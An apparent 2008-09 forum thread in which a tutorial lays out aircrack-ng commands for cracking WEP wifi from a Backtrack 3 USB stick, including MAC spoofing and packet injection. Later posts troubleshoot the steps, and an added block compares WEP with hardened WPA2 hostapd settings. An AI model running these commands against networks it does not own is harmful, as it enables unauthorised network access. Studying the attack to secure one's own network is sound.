Use Backtrack 3 on a USB stick to crack WEP

Discussion in 'Linux' started by stewx, Sep 8, 2008.

  1. stewx
    Okay, brace yourselves for a tutorial on Clientless WEP-cracking on the Aspire One, using Backtrack 3 installed on a USB stick.

    -Hit F12 while booting to access the boot menu, and select your USB drive.
    -Select VESA KDE as your graphics mode.
    -When the desktop shows up, open a Terminal and enter the following commands:

    airmon-ng stop ath0
    ifconfig wifi0 down
    macchanger --mac 00:11:22:33:44:55 wifi0
    airmon-ng start wifi0
    airodump-ng ath0


    At this point, it will display the networks available, as well as the encryption on them, etc.

    Pick a network using WEP encryption, and with sufficient power (>15). From now on, the channel number of the AP you are attempting to crack = [chan#], its BSSID = [ap bssid], and the name of your dump file (it can be anything) = [dumpname].

    airodump-ng -c [chan#] -w [dumpname] --bssid [ap bssid] ath0

    Open another terminal.

    aireplay-ng -1 0 -a [ap bssid] -h 00:11:22:33:44:55 ath0
    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [ap bssid] -h 00:11:22:33:44:55 ath0


    Open another terminal.
    When the data on your capture reaches at least 5000, execute this command:
    aircrack-ng [dumpname.cap]

    Congrats. You've got your key. A reminder though, that it may take a ton of data (60,000+) to crack some networks without a client.
     
    stewx, Sep 8, 2008
    #1
  2. AAOfan
    Hi,

    I've got a problem when using Backtrack 3 in AAO: when I type "airmon -ng" in the terminal I obtain the following message: "-bash: airmon: command not found". The same happens if I type "aircrack" or "airodump".

    My Linux and hacking knowledge is absolutely zero, and I don't know if I'm doing anything wrong, or if I should do something else before typing "airmon", maybe change the path or something like that?

    I have seen several videos on YouTube in which they just open a terminal, type "airmon -ng" and it works perfectly, although they probably aren't using an AAO. For instance this one:


    My system specifications: Acer Aspire One, 1 GHz CPU, 1 GB RAM, 120 GB HDD, Windows XP SP2 installed on the HDD, Backtrack 3 installed on a 2 GB USB stick, booting in VESA KDE.

    When I choose "Start - Internet - Wireless Adapter" Backtrack finds many WLANs, so it's not a problem of having the Wifi switched off.

    I hope that you can help me. Thanks in advance.

    Yours,
    AAOfan
     
    AAOfan, Sep 12, 2008
    #2
  3. AAOfan
    hello again,

    I've found the solution to my problem. It's quite embarrassing to explain: when typing "airmon-ng" I used to place a space between "airmon" and "-ng". :oops:

    Sorry for posting such a silly message, if the Moderator reads this I would thank him if he could delete it.

    Happy WEP-cracking !!

    AAOFan

    Mod Edit: I have read your 2 posts, and have found them to be helpful. Deleting these will not be needed. :D
    -DiSK
     
    AAOfan, Sep 12, 2008
    #3
  4. soleblaze
    I'm too lazy to boot my bt3 atm, but does it have wesside-ng installed?
     
    soleblaze, Sep 12, 2008
    #4
  5. mikeyd1
    I'm having problems with step one. How do I boot from the USB drive with bt3 on it? I have the iso on the USB drive and have even decompressed it on there and then tried to boot from it by pressing F12 when the bootup screen comes up... but nothing. How do I get past step one?
     
    mikeyd1, Oct 5, 2008
    #5
  6. rbil
    You probably need to use unetbootin-linux. Read this page, it might give you the guidance you need ...

    http://news.softpedia.com/news/How-to-R ... 3316.shtml

    Essentially you'll have the iso file and unetbootin-linux. You run the latter like so:

    ./unetbootin-linux

    Then select the ISO you want to burn and the flash key you want to "burn" it on.

    Cheers.
     
    rbil, Oct 6, 2008
    #6
  7. soleblaze
    There are instructions on the bt3 wiki on how to create a bootable usb.

    Basically you extract the iso onto the USB stick and run bootinst.sh (or bootinst.bat if you're in Windows) in the boot directory on the USB stick. At least I remember it being called bootinst. It's something like that.
     
    soleblaze, Oct 6, 2008
    #7
  8. Helium
    It's like soleblaze described it.

    I used the one called "bt3final_usb.iso" from BT.
    Mount it and copy the folders 'boot' and 'BT3' to the USB stick.
    Then navigate in a terminal into the boot folder on the USB stick and execute a script to make the stick bootable:
    "bootinst.sh" for Linux/OSX, "bootinst.bat" for Windows.
    I tried in OSX but the script found errors, then tried in Windows and it worked. Forgot about the Aspire :)

    These are the instructions I followed: http://wiki.remote-exploit.org/index.ph ... _USB_stick

    When you boot up from the stick you get a menu to choose the graphics mode; I chose VESA KDE. You can press TAB to pause, otherwise it continues after 3 seconds. The next thing is a question about "video mode". I didn't choose; after a while it continues anyway.

    Next thing you're on the desktop. I took this screenshot: http://img231.imageshack.us/my.php?image=bt3td1.jpg
    The light for the wireless doesn't work btw.
    When you turn off the computer and remove the USB stick, the Aspire will start up next time in good old Linpus (if that's what you had before).
     
    Helium, Jan 14, 2009
    #8
  9. ss30
    I have got BT3 working from a USB stick with my Atheros :D. How do I get it to see my external USB Wifi card instead of my built-in Atheros card?

    Thanks

    ss30
     
    ss30, Feb 4, 2009
    #9
  10. WilYawn
    I got BT3 running from my USB stick but it doesn't find any networks. I find that very strange because my router (with WEP encryption) is just 3 feet away...

    Any advice for a linux noob? :oops:
     
    WilYawn, Feb 4, 2009
    #10
  11. WilYawn
    Never mind, got it running now :)

    Dunno why it didn't work the first time. Rebooted and everything worked great. So far I have only cracked my own network, but it's the only WEP network in the neighbourhood.

    Guess I'm gonna change to WPA-PSK encryption instead...
     
    WilYawn, Feb 5, 2009
    #11
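As an added example (not taken from any post in this thread), here are two hostapd.conf fragments side by side: the WEP setting that the tutorial in post #1 defeats, and the WPA2-PSK setting WilYawn is switching to. Interface name, SSID, channel, WEP key and passphrase are placeholder values, and the comment about MAC filtering refers to the macchanger step in the tutorial itself.

```ini
# hostapd-wep.conf  (WEAK: the configuration the tutorial above breaks)
# Placeholder values throughout; this fragment is for comparison only.
interface=wlan0
driver=nl80211
ssid=EXAMPLE-NET
hw_mode=g
channel=6
# Open-system authentication; "shared key" auth (auth_algs=2) is worse,
# because the challenge/response exchange exposes RC4 keystream directly.
auth_algs=1
wep_default_key=0
# 104-bit WEP key as 26 hex digits. Key length does not matter: the attack
# above works by collecting IVs, not by guessing the key.
wep_key0=0123456789ABCDEF0123456789
# A MAC allow-list (macaddr_acl=1 plus accept_mac_file) adds nothing here:
# the tutorial's first step is "macchanger --mac 00:11:22:33:44:55 wifi0".

# hostapd-wpa2.conf  (CORRECTED: WPA2-PSK with AES-CCMP)
interface=wlan0
driver=nl80211
ssid=EXAMPLE-NET
hw_mode=g
channel=6
auth_algs=1
# wpa=2 selects RSN/WPA2 only; wpa=3 would re-enable WPA1/TKIP fallback.
wpa=2
wpa_key_mgmt=WPA-PSK
# CCMP only; do not list TKIP in rsn_pairwise.
rsn_pairwise=CCMP
# The PSK is derived from this passphrase; offline guessing of short or
# dictionary passphrases is the remaining weakness, so make it long and random.
wpa_passphrase=REPLACE-WITH-A-LONG-RANDOM-PASSPHRASE
# Require protected management frames (802.11w). Clients that do not
# support PMF will fail to associate; use ieee80211w=1 to make it optional.
ieee80211w=2
```

Each fragment is a complete alternative hostapd.conf; run hostapd against one or the other, never both on the same interface.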
  12. sjukperro
    Hi, I followed the guide but can't get bt3 to catch any IVs (don't really know what IVs are but I just got 1 of 'em :oops: ). Then it says something about retrying the cracking when I get 5000 IVs. Anyone have any ideas on what I'm doing wrong?


    thnx in advance
    //Johan
     
    sjukperro, Feb 7, 2009
    #12
  13. Mopeto
    Double-check that the aireplay command is working; maybe the user uses MAC filtering and it will not work like that.
     
    Mopeto, Feb 10, 2009
    #13
  14. sjukperro
    I think it's working as it should... don't get any error messages at least ;) but I can't see how many IVs I capture anywhere. Think that can have something to do with it?


    I followed another tutorial where they changed a little in step 7 and the last step, and now I'm getting around 600 IVs (still don't know what that is though :oops: ). But that ain't enough and I don't know what I should do to get any more IVs. No matter how long I leave it running it just won't crack the key :S
    //johan
     
    sjukperro, Feb 10, 2009
    #14
  15. Bradszy
    No offence, but if you guys can't follow this tutorial, then maybe you should stick to paying for your wifi.
    As a side note, BT3F doesn't come with wesside-ng installed, and I believe it isn't really needed anyway; it's kind of a newb tool.
    If you want wesside-ng then google how to install it, or upgrade to BT4B.
     
    Bradszy, Feb 16, 2009
    #15
  16. sjukperro
    I'm trying to crack my own key :D and how are you supposed to learn stuff if you don't ask and nothing you've read about works?
     
    sjukperro, Feb 16, 2009
    #16
  17. Bradszy
    Well, in the case of cracking WEP with Backtrack using the Aspire One, your argument is invalid.
    This should work for everyone.
    If it doesn't, you're doing something wrong.
    And doing something wrong with steps as clear as these is only doable by complete and total newbs.
    And if you were interested in this instead of being a skiddie then you might know that if your network is using WEP without a MAC filter you're an idiot. (No offence)
    End of rant.
     
    Bradszy, Feb 17, 2009
    #17
  18. sjukperro
    lol, no one forced you to answer :mrgreen: but I really don't know what I'm doing wrong. If I just knew that I might try to fix it, right?
     
    sjukperro, Feb 17, 2009
    #18
  19. covert
    Pot calling the kettle black. You're an idiot for thinking a MAC filter is any more security.
     
    covert, Feb 18, 2009
    #19
  20. Smartybones
    Until a few days ago, I had never looked at cracking WEP, and it's only been a few weeks that I have been learning Linux. I have read all sorts of guides on cracking WEP, but this one so far has been the most straightforward.

    One point to make though... in the part below...

    Code:
    Open another terminal.
    
    aireplay-ng -1 0 -a [ap bssid] -h 00:11:22:33:44:55 ath0
    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [ap bssid] -h 00:11:22:33:44:55 ath0
    
    change it to

    Code:
    aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b [ap bssid] -h 00:11:22:33:44:55 ath0

    What would help all of you who are having problems would be to read the manuals for aircrack and try to understand what each command you're giving is actually doing. And that is the problem that gets a lot of people annoyed: when people just come along and ask 'how do i .....' and expect people who have years of IT skills to hand over that knowledge for free, in a nicely packaged, step-by-step, foolproof guide.... Usually, when someone does a little research and can ask an intelligent question, or at least shows understanding of the subject, the response of the gurus is a little more forthcoming.

    I am sure some people want a package where they can just press a button, and hey presto, they are connected to the neighbour's wifi... And that's where the problems begin.... the fools will screw about with stuff and all that nonsense, next thing it's all in the newspapers, then everyone will move to more secure networks, then nobody will be able to check their email when they're out and about !!!
     
    Smartybones, Feb 18, 2009
    #20